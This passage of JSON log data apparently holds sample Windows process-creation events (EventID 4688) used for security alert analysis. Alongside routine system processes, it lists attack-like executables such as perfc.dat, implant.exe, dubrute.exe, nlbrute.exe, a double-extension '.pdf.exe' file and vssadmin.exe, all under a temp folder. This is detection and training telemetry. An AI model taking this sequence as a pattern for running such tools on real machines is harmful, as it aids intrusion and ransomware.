STICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"NewProcessId\":[\"0x1610\",\"0x1790\",\"0xcd8\",\"0x28c\",\"0x1284\",\"0xb10\",\"0x2a8\",\"0x90c\",\"0x130c\",\"0xc84\",\"0x570\",\"0x28c\",\"0xb8\",\"0xd14\",\"0x1490\",\"0x148c\",\"0x1414\",\"0x1530\",\"0x7b4\",\"0x1594\",\"0x1630\",\"0x16a0\",\"0x1694\",\"0x1658\",\"0x1740\",\"0xd14\",\"0x1094\",\"0x1270\",\"0xc10\",\"0x6ec\",\"0x1388\",\"0xc08\",\"0x364\",\"0x1338\",\"0x12fc\",\"0x1128\",\"0x13fc\",\"0x123c\",\"0x13e8\",\"0x6bc\",\"0x1254\",\"0x11b0\",\"0x1d0\",\"0x1070\",\"0x6ec\",\"0xc84\",\"0x16fc\",\"0x1700\",\"0x1728\",\"0x1738\",\"0x175c\",\"0x176c\",\"0x17a8\",\"0x17a0\",\"0x17cc\",\"0x17e8\",\"0x143c\",\"0x1064\",\"0x1434\",\"0xbb4\",\"0x1404\",\"0x148c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x1550\",\"0x690\",\"0x123c\",\"0x244\",\"0xa10\",\"0xc54\",\"0xbc8\",\"0x10cc\",\"0x1288\",\"0x3dc\",\"0x2a8\",\"0xa5c\",\"0xfc0\",\"0x10b8\",\"0x132c\",\"0x4e8\",\"0xcd8\",\"0x97c\",\"0x90c\",\"0xe68\",\"0x12fc\",\"0xc18\",\"0xbb4\",\"0x1274\",\"0x614\",\"0xd10\",\"0xbdc\",\"0x135c\",\"0x103c\",\"0x1014\",\"0xbb4\",\"0x11cc\",\"0x123c\",\"0x132c\",\"0x156c\",\"0x1580\",\"0x15a0\",\"0x15b4\",\"0x15d4\",\"0x15e8\",\"0x1608\",\"0x161c\",\"0x163c\",\"0x1650\",\"0x1670\",\"0x1684\",\"0x16a4\",\"0x16b8\",\"0x16d8\",\"0x16ec\",\"0x170c\",\"0xa08\",\"0x4e8\",\"0x240\",\"0x1250\",\"0x140c\",\"0x142c\",\"0x1448\",\"0x1450\",\"0x1458\",\"0x1498\",\"0x14ac\",\"0x14cc\",\"0x14e0\",\"0xbdc\",\"0x13a8\",\"0xa4\",\"0x1500\",\"0x1514\",\"0x1534\",\"0x154c\",\"0x1490\",\"0x1464\",\"0x142c\",\"0x14b0\",\"0x14c0\",\"0x14fc\",\"0x14f0\",\"0x14e8\",\"0x152c\",\"0x1520\",\"0x1514\",\"0x1550\",\"0x1560\",\"0x1584\",\"0x1580\",\"0x15c0\",\"0x1600\",\"0x15f0\",\"0x162c\",\"0x166c\",\"0x1660\",\"0x1658\",\"0x169c\",\"0x168c\",\"0x16c8\",\"0x1560\",\"0x158c\",\"0x15d0\",\"0x15c8\",\"0x15ec\",\"0x15e8\",\"0x1630\",\"0x1668\",\"0x1658\",\"0x1664\",\"0x16d4\",\"0x16c0\",\"0x1704\",\"0x16fc\",\"0x11cc\",\"0x99c\",\"0x11c4\",\"0xd14\",\"0xaa8\",\"0x138c\",\"0xa60\",\"0xab8\",\"0xfbc\",\"0x1380\",\"0x5cc\",\"0x16f4\",\"0x1770\",\"0x1774\",\"0x1728\",\"0x1798\",\"0x1758\",\"0x17a8\",\"0x17f8\",\"0x17cc\",\"0x1414\",\"0x28c\",\"0xc18\",\"0x1404\",\"0x147c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x15b8\",\"0x15d0\",\"0x158c\",\"0x1638\",\"0x1624\",\"0x1628\",\"0x1654\",\"0x169c\",\"0x1694\",\"0x16c4\",\"0x1724\",\"0x1744\",\"0x1758\",\"0x1778\",\"0x178c\",\"0x17ac\",\"0x17bc\",\"0x17c0\",\"0x17dc\",\"0x17e4\",\"0x1440\",\"0x1434\",\"0x1424\",\"0x123c\",\"0x240\",\"0x1040\",\"0x690\",\"0x11ac\",\"0xd04\",\"0xc18\",\"0x13e4\",\"0x10e4\",\"0x90c\",\"0xfbc\",\"0xbdc\",\"0x57c\",\"0x10fc\",\"0xd78\",\"0x1054\",\"0x12dc\",\"0xb8\",\"0x11b4\",\"0x1020\",\"0xd80\",\"0xbdc\",\"0x690\",\"0x6d4\",\"0x54c\",\"0x93c\",\"0x138c\",\"0x1258\",\"0xf94\",\"0x123c\",\"0x11e4\",\"0xa08\",\"0x125c\",\"0x10f4\",\"0x1020\",\"0x638\",\"0x10cc\",\"0x107c\",\"0x1064\",\"0x1220\",\"0x1258\",\"0xab8\",\"0xbd8\",\"0x123c\",\"0xcd8\",\"0xd14\",\"0xa10\",\"0x1298\",\"0xac4\",\"0x364\",\"0x1128\",\"0xc54\",\"0x12e8\",\"0x17fc\",\"0x17f0\",\"0x1434\",\"0x1404\",\"0x13a4\",\"0x10f4\",\"0x11e8\",\"0x364\",\"0xc08\",\"0x338\",\"0xfbc\",\"0x640\",\"0x1320\",\"0x13b0\",\"0x1388\",\"0x11c8\",\"0x544\",\"0x894\",\"0xde8\",\"0x778\",\"0x2f8\",\"0x364\",\"0x1c4\",\"0x99c\",\"0x10c8\",\"0x13e0\",\"0x1550\",\"0x15d0\",\"0x13b4\",\"0x16d0\",\"0x11a8\",\"0x244\",\"0x1050\",\"0x690\",\"0xb8\",\"0x1364\",\"0x1148\",\"0x10e0\",\"0x12fc\",\"0x5cc\",\"0x518\",\"0xf84\",\"0xd64\",\"0xc18\",\"0xb50\",\"0x10a4\",\"0x13b4\",\"0xe3c\",\"0xd64\",\"0xc18\",\"0x10e0\",\"0x108c\",\"0x28c\",\"0x11b4\",\"0xddc\",\"0xbe8\",\"0x130c\",\"0x1040\",\"0x1370\",\"0x8e4\",\"0x10fc\",\"0x1298\",\"0x7f8\",\"0xf94\",\"0xc18\",\"0xa84\",\"0x1348\",\"0xe34\",\"0x11b4\",\"0x13b4\",\"0x1148\",\"0xde8\",\"0xc08\",\"0x1338\",\"0xb8\",\"0x6d4\"],\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\